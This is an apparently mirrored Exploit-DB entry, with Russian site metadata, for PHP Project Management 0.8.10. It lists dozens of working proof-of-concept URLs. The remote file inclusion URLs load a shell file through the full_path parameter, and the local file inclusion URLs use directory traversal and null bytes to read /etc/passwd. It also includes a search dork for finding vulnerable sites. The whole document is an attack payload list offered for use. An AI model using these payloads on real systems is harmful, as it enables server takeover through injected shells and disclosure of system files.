- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4549
- Проверка EDB
-
- Пройдено
- Автор
- GOLD_M
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5642 cve-2007-5641
- Дата публикации
- 2007-10-21
Код:
# PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities
# http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz
# DORK : "PHP Project Management 0.8.10"
# POC : RFI
# /modules/certinfo/index.php?full_path=http://localhost/shell.txt?
# /modules/emails/index.php?full_path=http://localhost/shell.txt?
# /modules/events/index.php?full_path=http://localhost/shell.txt?
# /modules/fax/index.php?full_path=http://localhost/shell.txt?
# /modules/files/index.php?full_path=http://localhost/shell.txt?
# /modules/files/list.php?full_path=http://localhost/shell.txt?
# /modules/groupadm/index.php?full_path=http://localhost/shell.txt?
# /modules/history/index.php?full_path=http://localhost/shell.txt?
# /modules/info/index.php?full_path=http://localhost/shell.txt?
# /modules/log/index.php?full_path=http://localhost/shell.txt?
# /modules/mail/index.php?full_path=http://localhost/shell.txt?
# /modules/messages/index.php?full_path=http://localhost/shell.txt?
# /modules/organizations/index.php?full_path=http://localhost/shell.txt?
# /modules/phones/index.php?full_path=http://localhost/shell.txt?
# /modules/presence/index.php?full_path=http://localhost/shell.txt?
# /modules/projects/index.php?full_path=http://localhost/shell.txt?
# /modules/projects/summary.inc.php?full_path=http://localhost/shell.txt?
# /modules/projects/list.php?full_path=http://localhost/shell.txt?
# /modules/reports/index.php?full_path=http://localhost/shell.txt?
# /modules/search/index.php?full_path=http://localhost/shell.txt?
# /modules/snf/index.php?full_path=http://localhost/she ll.txt?
# /modules/syslog/index.php?full_path=http://localhost/shell.txt?
# /modules/tasks/searchsimilar.php?full_path=http://localhost/shell.txt?
# /modules/tasks/index.php?full_path=http://localhost/shell.txt?
# /modules/tasks/summary.inc.php?full_path=http://localhost/shell.txt?
# /modules/useradm/index.php?full_path=http://localhost/shell.txt?
# /ajax/loadsplash.php?full_path=http://localhost/shell.txt?
# /blocks/birthday.php?full_path=http://localhost/shell.txt?
# /blocks/events.php?full_path=http://localhost/shell.txt?
# /blocks/help.php?full_path=http://localhost/shell.txt?
# POC : LFI
# /modules/certinfo/index.php?module=../../../../../../etc/passwd%00
# /modules/emails/index.php?module=../../../../../../etc/passwd%00
# /modules/events/index.php?module=../../../../../../etc/passwd%00
# /modules/fax/index.php?module=../../../../../../etc/passwd%00
# /modules/files/index.php?module=../../../../../../etc/passwd%00
# /modules/files/list.php?def_lang=../../../../../../../../../etc/passwd%00
# /modules/groupadm/index.php?module=../../../../../../etc/passwd%00
# /modules/history/index.php?module=../../../../../../etc/passwd%00
# /modules/info/index.php?module=../../../../../../etc/passwd%00
# /modules/log/index.php?module=../../../../../../etc/passwd%00
# /modules/mail/index.php?module=../../../../../../etc/passwd%00
# /modules/messages/index.php?module=../../../../../../etc/passwd%00
# /modules/organizations/index.php?module=../../../../../../etc/passwd%00
# /modules/phones/index.php?module=../../../../../../etc/passwd%00
# /modules/presence/index.php?module=../../../../../../etc/passwd%00
# /modules/projects/index.php?module=../../../../../../etc/passwd%00
# /modules/projects/summary.inc.php?m_path=../../../../../../etc/passwd%00
# /modules/projects/list.php?module=../../../../../../etc/passwd%00
# /modules/reports/index.php?module=../../../../../../etc/passwd%00
# /modules/search/index.php?module=../../../../../../etc/passwd%00
# /modules/snf/index.php?module=../../../../../../etc/passwd%00
# /modules/syslog/index.php?module=../../../../../../etc/passwd%00
# /modules/tasks/index.php?module=../../../../../../etc/passwd%00
# /modules/tasks/summary.inc.php?m_path=../../../../../../etc/passwd%00
# /modules/useradm/index.php?module=../../../../../../etc/passwd%00
# milw0rm.com [2007-10-21]
- Источник
- www.exploit-db.com